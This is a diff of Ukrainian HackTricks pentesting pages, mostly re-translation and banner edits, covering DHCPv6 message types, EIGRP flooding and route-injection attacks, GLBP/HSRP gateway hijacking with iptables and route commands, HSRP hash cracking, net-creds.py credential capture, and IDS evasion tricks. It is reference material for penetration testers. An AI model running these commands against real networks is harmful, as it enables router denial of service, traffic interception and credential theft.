-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} ### Порівняння типів повідомлень DHCPv6 та DHCPv4 У таблиці нижче представлено порівняльний огляд типів повідомлень DHCPv6 та DHCPv4: @@ -31,33 +32,34 @@ **Детальний пояснення типів повідомлень DHCPv6:** 1. **Solicit (1)**: Ініційовано клієнтом DHCPv6 для пошуку доступних серверів. -2. **Advertise (2)**: Надсилається серверами у відповідь на Solicit, вказуючи на доступність DHCP-сервісу. +2. **Advertise (2)**: Надсилається серверами у відповідь на Solicit, що вказує на доступність DHCP-сервісу. 3. **Request (3)**: Клієнти використовують це для запиту IP-адрес або префіксів від певного сервера. 4. **Confirm (4)**: Використовується клієнтом для перевірки того, чи призначені адреси ще дійсні в мережі, зазвичай після зміни мережі. 5. **Renew (5)**: Клієнти надсилають це оригінальному серверу для продовження терміну дії адрес або оновлення конфігурацій. -6. **Rebind (6)**: Надсилається будь-якому серверу для продовження терміну дії адрес або оновлення конфігурацій, особливо коли не отримано відповіді на Renew. +6. **Rebind (6)**: Надсилається будь-якому серверу для продовження терміну дії адрес або оновлення конфігурацій, особливо коли на Renew не отримано відповіді. 7. **Reply (7)**: Сервери використовують це для надання адрес, параметрів конфігурації або для підтвердження повідомлень, таких як Release або Decline. -8. **Release (8)**: Клієнти повідомляють сервер про припинення використання одного або декількох призначених адрес. +8. **Release (8)**: Клієнти повідомляють сервер про припинення використання однієї або декількох призначених адрес. 9. **Decline (9)**: Надсилається клієнтами для повідомлення про конфлікт призначених адрес в мережі. 10. **Reconfigure (10)**: Сервери підтримують клієнтів у запуску транзакцій для нових або оновлених конфігурацій. 11. **Information-Request (11)**: Клієнти запитують параметри конфігурації без призначення IP-адреси. -12. **Relay-Forw (12)**: Релеюючі агенти пересилають повідомлення серверам. -13. **Relay-Repl (13)**: Сервери відповідають релеюючим агентам, які потім доставляють повідомлення клієнту. +12. **Relay-Forw (12)**: Реле-агенти пересилають повідомлення серверам. +13. **Relay-Repl (13)**: Сервери відповідають реле-агентам, які потім доставляють повідомлення клієнту. ## Посилання * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index ee0075628..91b5b4ec5 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,24 +1,25 @@ # Атаки на EIGRP +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} **Це підсумок атак, викритих в** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Перевірте його для отримання додаткової інформації. -## **Атака на створення фальшивих сусідів EIGRP** +## **Атака на підроблених сусідів EIGRP** -- **Мета**: Перевантаження процесорів маршрутизаторів шляхом затоплення їх пакетами привітань EIGRP, що може призвести до атаки з відмовою в обслуговуванні (DoS). +- **Мета**: Перевантажити процесори маршрутизаторів, затопивши їх пакетами привітань EIGRP, що потенційно може призвести до атаки з відмовою в обслуговуванні (DoS). - **Інструмент**: Сценарій **helloflooding.py**. - **Виконання**: %%%bash @@ -27,26 +28,26 @@ - **Параметри**: - `--interface`: Вказує мережевий інтерфейс, наприклад, `eth0`. - `--as`: Визначає номер автономної системи EIGRP, наприклад, `1`. -- `--subnet`: Встановлює місце підмережі, наприклад, `10.10.100.0/24`. +- `--subnet`: Встановлює місцезнаходження підмережі, наприклад, `10.10.100.0/24`. ## **Атака чорної діри EIGRP** -- **Мета**: Перешкоджати потоку мережевого трафіку шляхом впровадження хибного маршруту, що призводить до чорної діри, куди трафік направляється до неіснуючого пункту призначення. +- **Мета**: Порушити потік мережевого трафіку, впроваджуючи хибний маршрут, що призводить до чорної діри, куди трафік спрямовується до неіснуючого пункту призначення. - **Інструмент**: Сценарій **routeinject.py**. - **Виконання**: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%% - **Параметри**: -- `--interface`: Вказує інтерфейс системи атакуючого. +- `--interface`: Вказує інтерфейс системи атакувальника. - `--as`: Визначає номер AS EIGRP. -- `--src`: Встановлює IP-адресу атакуючого. +- `--src`: Встановлює IP-адресу атакувальника. - `--dst`: Встановлює IP цільової підмережі. - `--prefix`: Визначає маску IP цільової підмережі. -## **Атака на зловживання значеннями K-Values** +## **Атака на зловживання K-значеннями** -- **Мета**: Створення постійних розривів та повторних підключень в домені EIGRP шляхом впровадження змінених значень K-Values, що фактично призводить до атаки з відмовою в обслуговуванні. +- **Мета**: Створити постійні розриви та повторні підключення в домені EIGRP, впроваджуючи змінені значення K, що фактично призводить до атаки з відмовою в обслуговуванні. - **Інструмент**: Сценарій **relationshipnightmare.py**. - **Виконання**: %%%bash @@ -55,11 +56,11 @@ - **Параметри**: - `--interface`: Вказує мережевий інтерфейс. - `--as`: Визначає номер AS EIGRP. -- `--src`: Встановлює IP-адресу легітимного маршрутизатора. +- `--src`: Встановлює IP-адресу законного маршрутизатора. ## **Атака переповнення таблиці маршрутизації** -- **Мета**: Напруження процесора та оперативної пам'яті маршрутизатора шляхом затоплення таблиці маршрутизації численними хибними маршрутами. +- **Мета**: Навантажити процесор та оперативну пам'ять маршрутизатора, затопивши таблицю маршрутизації численними хибними маршрутами. - **Інструмент**: Сценарій **routingtableoverflow.py**. - **Виконання**: %%%bash @@ -68,4 +69,4 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - **Параметри**: - `--interface`: Вказує мережевий інтерфейс. - `--as`: Визначає номер AS EIGRP. -- `--src`: Встановлює IP-адресу атакуючого. +- `--src`: Встановлює IP-адресу атакувальника. diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index dd34b7f7e..05f758323 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,30 +1,34 @@ -# Атаки GLBP та HSRP +# Атаки GLBP & HSRP + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} +
+ +{% embed url="https://websec.nl/" %} ## Огляд Викрадення FHRP ### Відомості про FHRP -FHRP призначений для забезпечення надійності мережі шляхом об'єднання кількох маршрутизаторів в один віртуальний блок, тим самим покращуючи розподіл навантаження та стійкість до відмов. Компанія Cisco Systems представила важливі протоколи в цьому наборі, такі як GLBP та HSRP. +FHRP призначений для забезпечення надійності мережі шляхом об'єднання кількох маршрутизаторів в один віртуальний блок, що покращує розподіл навантаження та стійкість до відмов. Компанія Cisco Systems представила важливі протоколи в цьому наборі, такі як GLBP та HSRP. ### Відомості про протокол GLBP Створення Cisco, GLBP, працює на стеку TCP/IP, використовуючи UDP на порту 3222 для зв'язку. Маршрутизатори в групі GLBP обмінюються пакетами "hello" кожні 3 секунди. Якщо маршрутизатор не відправляє ці пакети протягом 10 секунд, вважається, що він вийшов з ладу. Однак ці таймери не є фіксованими і можуть бути змінені. ### Операції та Розподіл Навантаження в GLBP -GLBP виділяється тим, що дозволяє розподіл навантаження між маршрутизаторами за допомогою однієї віртуальної IP-адреси, спарованої з кількома віртуальними MAC-адресами. У групі GLBP кожен маршрутизатор бере участь у пересиланні пакетів. На відміну від HSRP/VRRP, GLBP пропонує справжній балансування навантаження за допомогою кількох механізмів: +GLBP виділяється тим, що дозволяє розподіл навантаження між маршрутизаторами за допомогою однієї віртуальної IP-адреси, пов'язаної з кількома віртуальними MAC-адресами. У групі GLBP кожен маршрутизатор бере участь у пересиланні пакетів. На відміну від HSRP/VRRP, GLBP пропонує справжній балансування навантаження за допомогою кількох механізмів: - **Балансування Навантаження Залежне від Хоста:** Забезпечує постійне призначення MAC-адреси AVF хосту, що є важливим для стабільних конфігурацій NAT. - **Кругове Балансування Навантаження:** Стандартний підхід, чергування призначення MAC-адреси AVF серед запитуючих хостів. @@ -35,7 +39,7 @@ GLBP виділяється тим, що дозволяє розподіл на - **AVF (Активний Віртуальний Пересилувач):** Маршрутизатор, призначений для управління мережевим трафіком. - **Пріоритет GLBP:** Метрика, яка визначає AVG, починаючи зі значення за замовчуванням 100 і в діапазоні від 1 до 255. - **Вага GLBP:** Відображає поточне навантаження на маршрутизатор, яке можна налаштувати як вручну, так і через відстеження об'єктів. -- **Віртуальна IP-адреса GLBP:** Служить в якості шлюзу за замовчуванням мережі для всіх підключених пристроїв. +- **Віртуальна IP-адреса GLBP:** Використовується як шлюз за замовчуванням мережі для всіх підключених пристроїв. Для взаємодії GLBP використовує зарезервовану мультікаст-адресу 224.0.0.102 та UDP-порт 3222. Маршрутизатори відправляють пакети "hello" кожні 3 секунди і вважаються неопераційними, якщо пакет пропущено протягом 10 секунд. @@ -45,16 +49,16 @@ GLBP виділяється тим, що дозволяє розподіл на ### Виконання Атаки GLBP за допомогою Loki [Loki](https://github.com/raizo62/loki_on_kali) може виконати атаку GLBP, впроваджуючи пакет з встановленим пріоритетом та вагою 255. Перед атакою необхідно зібрати інформацію, таку як віртуальна IP-адреса, наявність аутентифікації та значення пріоритету маршрутизатора за допомогою інструментів, таких як Wireshark. -Кроки атаки: +Кроки Атаки: 1. Перейдіть у режим прослуховування та увімкніть пересилання IP. 2. Визначте цільовий маршрутизатор та отримайте його IP. 3. Створіть вільний ARP. 4. Впроваджуйте зловмисний пакет GLBP, видаючи себе за AVG. 5. Призначте вторинну IP-адресу мережному інтерфейсу атакуючого, відображаючи віртуальну IP GLBP. 6. Реалізуйте SNAT для повної видимості трафіку. -7. Налаштуйте маршрутизацію для забезпечення продовженого доступу до Інтернету через оригінальний маршрутизатор AVG. +7. Налаштуйте маршрутизацію, щоб забезпечити продовжений доступ до Інтернету через оригінальний маршрутизатор AVG. -Дотримуючись цих кроків, атакуючий розміщує себе як "людина посередині", здатний перехоплювати та аналізувати мережевий трафік, включаючи незашифровані або чутливі дані. +Виконуючи ці кроки, атакуючий розміщує себе як "людина посередині", здатний перехоплювати та аналізувати мережевий трафік, включаючи незашифровані або чутливі дані. Для демонстрації, ось необхідні фрагменти команд: ```bash @@ -70,20 +74,20 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` -### Пасивне пояснення про захоплення HSRP з деталями команд +### Пасивне пояснення про викрадення HSRP з командними деталями #### Огляд HSRP (Протокол гарячого резервування маршрутизатора/протокол забезпечення резервування) -HSRP є пропрієтарним протоколом Cisco, призначеним для забезпечення резервування мережевих шлюзів. Він дозволяє налаштування кількох фізичних маршрутизаторів у єдину логічну одиницю зі спільною IP-адресою. Ця логічна одиниця керується основним маршрутизатором, відповідальним за направлення трафіку. На відміну від GLBP, який використовує метрики, такі як пріоритет та вага для балансування навантаження, HSRP покладається на один активний маршрутизатор для керування трафіком. +HSRP є пропрієтарним протоколом Cisco, призначеним для забезпечення резервування мережевих шлюзів. Він дозволяє конфігурувати кілька фізичних маршрутизаторів у єдину логічну одиницю зі спільною IP-адресою. Ця логічна одиниця керується основним маршрутизатором, відповідальним за направлення трафіку. На відміну від GLBP, який використовує метрики, такі як пріоритет та вага для балансування навантаження, HSRP покладається на один активний маршрутизатор для керування трафіком. #### Ролі та термінологія в HSRP -- **Активний маршрутизатор HSRP**: Пристрій, який діє як шлюз, керуючи потоком трафіку. -- **Резервний маршрутизатор HSRP**: Резервний маршрутизатор, готовий взяти на себе роль активного маршрутизатора у разі його відмови. -- **Група HSRP**: Набір маршрутизаторів, які співпрацюють для утворення одного стійкого віртуального маршрутизатора. -- **MAC-адреса HSRP**: Віртуальна MAC-адреса, призначена для логічного маршрутизатора в налаштуванні HSRP. -- **Віртуальна IP-адреса HSRP**: Віртуальна IP-адреса групи HSRP, яка діє як типовий шлюз для підключених пристроїв. +- **Активний маршрутизатор HSRP**: пристрій, який діє як шлюз, керуючи потоком трафіку. +- **Резервний маршрутизатор HSRP**: резервний маршрутизатор, готовий взяти на себе функції активного маршрутизатора у разі його відмови. +- **Група HSRP**: набір маршрутизаторів, які співпрацюють для утворення одного стійкого віртуального маршрутизатора. +- **MAC-адреса HSRP**: віртуальна MAC-адреса, призначена для логічного маршрутизатора в налаштуванні HSRP. +- **Віртуальна IP-адреса HSRP**: віртуальна IP-адреса групи HSRP, яка діє як шлюз за замовчуванням для підключених пристроїв. #### Версії HSRP -HSRP має дві версії, HSRPv1 та HSRPv2, що відрізняються головним чином ємністю групи, використанням мультікастових IP-адрес для обміну інформацією та структурою віртуальної MAC-адреси. Протокол використовує конкретні мультікастові IP-адреси для обміну інформацією про послуги, з Hello-пакетами, що відправляються кожні 3 секунди. Маршрутизатор вважається неактивним, якщо не отримано жодного пакета протягом 10 секунд. +HSRP має дві версії, HSRPv1 та HSRPv2, що відрізняються головним чином ємністю груп, використанням мультикастових IP-адрес для обміну інформацією та структурою віртуальної MAC-адреси. Протокол використовує конкретні мультикастові IP-адреси для обміну інформацією про послуги, з Hello-пакетами, що відправляються кожні 3 секунди. Маршрутизатор вважається неактивним, якщо не отримано жодного пакета протягом 10 секунд. #### Механізм атаки HSRP Атаки HSRP включають примусове захоплення ролі Активного маршрутизатора шляхом впровадження максимального значення пріоритету. Це може призвести до атаки типу "Людина посередині" (MITM). Необхідні передатактні кроки включають збір даних про налаштування HSRP, що може бути виконано за допомогою Wireshark для аналізу трафіку. @@ -97,7 +101,7 @@ tcpdump -w hsrp_traffic.pcap ```shell python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes ``` -3. Взламайте хеші MD5 за допомогою John the Ripper. +3. Відкрийте хеші MD5 за допомогою John the Ripper. ```shell john --wordlist=mywordlist.txt hsrp_hashes ``` @@ -110,7 +114,7 @@ john --wordlist=mywordlist.txt hsrp_hashes sudo ip link set eth0 promisc on sudo sysctl -w net.ipv4.ip_forward=1 ``` -3. Використовуйте Loki для спрямування на конкретний маршрутизатор, введіть взламаний пароль HSRP та виконайте необхідні налаштування для видачі себе за Активний маршрутизатор. +3. Використовуйте Loki для спрямування на конкретний маршрутизатор, введіть розкритий пароль HSRP та виконайте необхідні налаштування для видачі себе за Активний маршрутизатор. 4. Після отримання ролі Активного маршрутизатора налаштуйте мережевий інтерфейс та IP-таблиці для перехоплення законного трафіку. ```shell sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 @@ -121,12 +125,16 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` -6. Використовуйте net-creds.py або подібний інструмент для захоплення облікових даних з перехопленого трафіку. +6. Використовуйте net-creds.py або подібну утиліту для захоплення облікових даних з перехопленого трафіку. ```shell sudo python2 net-creds.py -i eth0 ``` -Виконання цих кроків ставить атакуючого в положення для перехоплення та маніпулювання трафіком, аналогічно процедурі захоплення GLBP. Це підкреслює вразливість протоколів резервування, таких як HSRP, та необхідність надійних заходів безпеки. +Виконання цих кроків ставить атакуючого в положення для перехоплення та маніпулювання трафіком, аналогічно процедурі викрадення GLBP. Це підкреслює вразливість протоколів резервування, таких як HSRP, та необхідність надійних заходів безпеки. ## Посилання - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) + +
+ +{% embed url="https://websec.nl/" %} diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index dd2ec16e9..81e3c8b31 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # **Маніпулювання TTL** -Надішліть деякі пакети з TTL достатнім для досягнення IDS/IPS, але недостатнім для досягнення кінцевої системи. Потім надішліть інші пакети з такою ж послідовністю, як і інші, щоб IPS/IDS подумав, що вони є повторами і не перевіряв їх, але насправді вони несуть злоумисний вміст. +Надішліть деякі пакети з TTL достатнім для досягнення IDS/IPS, але недостатнім для досягнення кінцевої системи. Потім надішліть інші пакети з такою ж послідовністю, як і попередні, щоб IPS/IDS вважав їх повторами і не перевіряв, але насправді вони містять шкідливий вміст. **Параметр Nmap:** `--ttlvalue ` @@ -35,37 +36,38 @@ Датчики зазвичай не обчислюють контрольну суму з міркувань продуктивності. Тому зловмисник може надіслати пакет, який буде **інтерпретований сенсором, але відхилений кінцевим хостом.** Наприклад: -Надішліть пакет з прапорцем RST та недійсною контрольною сумою, тоді IPS/IDS може подумати, що цей пакет закриє з'єднання, але кінцевий хост відкине пакет, оскільки контрольна сума недійсна. +Надішліть пакет з прапорцем RST та недійсною контрольною сумою, тоді IPS/IDS може вважати, що цей пакет закриє з'єднання, але кінцевий хост відкине пакет через недійсну контрольну суму. -# **Незвичайні параметри IP та TCP** +# **Незвичайні IP та TCP параметри** -Сенсор може ігнорувати пакети з певними прапорцями та параметрами, встановленими в заголовках IP та TCP, тоді як кінцевий хост приймає пакет при отриманні. +Сенсор може проігнорувати пакети з певними прапорцями та параметрами, встановленими в IP та TCP заголовках, тоді як кінцевий хост прийме пакет при отриманні. # **Перекривання** Можливо, коли ви фрагментуєте пакет, між пакетами існує яке-небудь перекриття (можливо, перші 8 байтів пакета 2 перекриваються з останніми 8 байтами пакета 1, а останні 8 байтів пакета 2 перекриваються з першими 8 байтами пакета 3). Тоді, якщо IDS/IPS збирає їх по-іншому, ніж кінцевий хост, буде інтерпретовано інший пакет.\ -Або можливо, приходять 2 пакети з однаковим зміщенням, і хост повинен вирішити, який з них він бере. +Або можливо, приходять 2 пакети з однаковим зміщенням, і хост повинен вирішити, який з них він приймає. * **BSD**: Має перевагу для пакетів з меншим _зміщенням_. Для пакетів з однаковим зміщенням він вибере перший. * **Linux**: Як BSD, але він віддає перевагу останньому пакету з однаковим зміщенням. * **Перший** (Windows): Перше значення, яке приходить, залишається. -* **Останній** (cisco): Останнє значення, яке приходить, залишається. +* **Останній** (Cisco): Останнє значення, яке приходить, залишається. # Інструменти * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
